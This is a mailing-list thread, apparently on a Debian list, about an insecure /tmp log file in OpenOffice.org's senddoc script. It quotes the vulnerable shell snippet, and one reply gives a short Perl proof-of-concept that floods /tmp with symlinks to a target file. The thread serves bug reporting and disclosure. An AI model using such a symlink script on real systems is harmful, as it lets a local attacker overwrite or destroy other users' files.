On 06:13 Mon 25 Aug , Rene Engelhard wrote: RE> Hi, RE> Dmitry E. Oboukhov wrote: RE>> For example if a script uses in its work a temp file which is created RE>> in /tmp directory, then every user can create symlink with the same RE>> name in this directory in order to destroy or rewrite some system RE>> or user file. Symlink attack may also lead not only to the data RE>> desctruction but to denial of service as well. RE>> RE>> Even if you create files or directories with help of function 'RANDOM' RE>> or pid(), then your system is not protected. Attacker can create many RE>> symlinks in order to destroy your data or create 'denial of service' RE>> for your package scripts. RE> [...] RE>> Binary-package: openoffice.org-common (1:2.4.1-6) RE>> file: /usr/lib/openoffice/program/senddoc
RE> I guess you mean this snippet in the mutt handling part of senddoc? $ grep -A5 -B5 /tmp/ /usr/lib/openoffice/program/senddoc #!/bin/sh URI_ENCODE="`dirname $0`/uri-encode" echo "$@" > /tmp/log.obr.$$ echo "$#" >> /tmp/log.obr.$$ # tries to locate the executable specified # as first parameter in the user's path. which() { if [ ! -z "$1" ]; then example for attacker script: #!...perl $file_for_attack='/path/to/file'; while(1) { exit unless fork; symlink $file_for_attack, "/tmp//tmp/log.obr.$_" for ($$ .. $$+10000); } RE> [...] RE> --body) RE> TEMPLATE="`basename $0`.mutt.XXXXXXXX" RE> BODY=`mktemp -q -t ${TEMPLATE}` RE> echo "$2" > $BODY RE> shift RE> [...] RE> x-terminal-emulator -e ${MAILER} \ RE> ${FROM:+-e} ${FROM:+"set from=\"${FROM}\""} \ RE> ${CC:+-c} ${CC:+"${CC}"} \ RE> ${BCC:+-b} ${BCC:+"${BCC}"} \ RE> ${SUBJECT:+-s} ${SUBJECT:+"${SUBJECT}"} \ RE> ${BODY:+-i} ${BODY:+"${BODY}"} \ RE> ${ATTACH:+-a} ${ATTACH:+"${ATTACH}"} \ RE> ${TO:+"${TO}"} & RE> rm -f $BODY RE> [...] RE> I so far thought mktemp was safe enough? (of course, we get RE> senddoc.mutt.<number>, but... RE> Regards, RE> Rene -- . ''`. Dmitry E. Oboukhov : :’ : [EMAIL PROTECTED] `. `~’ GPGKey: 1024D / F8E26537 2006-11-21 `- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
signature.asc
Description: Digital signature